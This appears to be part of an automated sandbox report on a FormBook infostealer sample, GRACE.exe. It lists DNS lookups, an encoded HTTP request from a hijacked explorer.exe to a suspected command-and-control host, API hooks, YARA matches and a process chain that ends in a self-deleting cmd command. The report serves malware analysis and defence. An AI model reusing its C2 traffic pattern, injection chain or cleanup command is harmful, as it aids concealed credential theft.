                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)www.11sxsx.comvps.temai.orgCNAME (Canonical name)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)vps.temai.orggfw.cloud301.netCNAME (Canonical name)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)gfw.cloud301.net141.164.47.167A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)gfw.cloud301.net158.247.206.75A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)gfw.cloud301.net45.32.19.21A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)gfw.cloud301.net45.32.11.11A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:31.529903889 CET8.8.8.8192.168.2.30xeb0dNo error (0)gfw.cloud301.net158.247.204.226A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:00:51.993443966 CET8.8.8.8192.168.2.30x50aNo error (0)www.luxusgrotte.com217.160.0.171A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:12.307245016 CET8.8.8.8192.168.2.30xd988No error (0)www.sterlworldshop.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:12.307245016 CET8.8.8.8192.168.2.30xd988No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:32.728943110 CET8.8.8.8192.168.2.30x7eb8No error (0)www.internetmarkaching.com104.21.69.246A (IP address)IN (0x0001)
                                                                                        Jan 27, 2021 08:01:32.728943110 CET8.8.8.8192.168.2.30x7eb8No error (0)www.internetmarkaching.com172.67.216.18A (IP address)IN (0x0001)

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.dl888.net

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.349739216.250.110.3580C:\Windows\explorer.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 27, 2021 07:58:44.928558111 CET3995OUTGET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1
                                                                                        Host: www.dl888.net
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        Jan 27, 2021 07:58:45.210340023 CET3996INHTTP/1.1 404 Not Found
                                                                                        Content-Length: 1308
                                                                                        Content-Type: text/html
                                                                                        Server: Microsoft-IIS/6.0
                                                                                        X-Powered-By: ASP.NET
                                                                                        Date: Wed, 27 Jan 2021 06:58:37 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7 aa b5 bd 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 38 31 38 30 22 3e 4d 69 63 72 6f 73 6f 66 74 20 b2 fa c6 b7 d6 a7 b3 d6 b7 fe ce f1 3c 2f 61 3e b2 a2 cb d1 cb f7 b0 fc c0 a8 26 6c 64 71 75 6f 3b 48 54 54 50 26 72 64 71 75 6f 3b ba cd 26 6c 64 71 75 6f 3b 34 30 34 26 72 64 71 75 6f 3b b5 c4 b1 ea cc e2 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b4 f2 bf aa 26 6c 64 71 75 6f 3b 49 49 53 20 b0 ef d6 fa 26 72 64 71 75 6f 3b a3 a8 bf c9 d4 da 20 49 49 53 20 b9 dc c0 ed c6 f7 20 28 69 6e 65 74 6d 67 72 29 20 d6 d0 b7 c3 ce ca a3 a9 a3 ac c8 bb ba f3 cb d1 cb
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li></li><li><a href="javascript:history.back(1)"></a></li></ul><h2>HTTP 404 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft </a>&ldquo;HTTP&rdquo;&ldquo;404&rdquo;</li><li>&ldquo;IIS &rdquo; IIS (inetmgr)


                                                                                        Code Manipulations

                                                                                        User Modules

                                                                                        Hook Summary

                                                                                        Function NameHook TypeActive in Processes
                                                                                        PeekMessageAINLINEexplorer.exe
                                                                                        PeekMessageWINLINEexplorer.exe
                                                                                        GetMessageWINLINEexplorer.exe
                                                                                        GetMessageAINLINEexplorer.exe

                                                                                        Processes

                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                        Function NameHook TypeNew Data
                                                                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3
                                                                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3
                                                                                        GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3
                                                                                        GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3

                                                                                        Statistics

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        Analysis Process: GRACE.exe PID: 6728 Parent PID: 5664

                                                                                        General

                                                                                        Start time:07:57:09
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Users\user\Desktop\GRACE.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\Desktop\GRACE.exe'
                                                                                        Imagebase:0x1e0000
                                                                                        File size:3215360 bytes
                                                                                        MD5 hash:9034ACBB2742281523525D715A4EE566
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        Analysis Process: AddInProcess32.exe PID: 6508 Parent PID: 6728

                                                                                        General

                                                                                        Start time:07:57:44
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Imagebase:0x8e0000
                                                                                        File size:42080 bytes
                                                                                        MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate

                                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 6508

                                                                                        General

                                                                                        Start time:07:57:49
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Windows\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:
                                                                                        Imagebase:0x7ff714890000
                                                                                        File size:3933184 bytes
                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Analysis Process: netsh.exe PID: 404 Parent PID: 3388

                                                                                        General

                                                                                        Start time:07:58:01
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                                        Imagebase:0x16b0000
                                                                                        File size:82944 bytes
                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:high

                                                                                        Analysis Process: cmd.exe PID: 2436 Parent PID: 404

                                                                                        General

                                                                                        Start time:07:58:07
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                        Imagebase:0x1220000
                                                                                        File size:232960 bytes
                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Analysis Process: conhost.exe PID: 7040 Parent PID: 2436

                                                                                        General

                                                                                        Start time:07:58:07
                                                                                        Start date:27/01/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6b2800000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                        Reset < >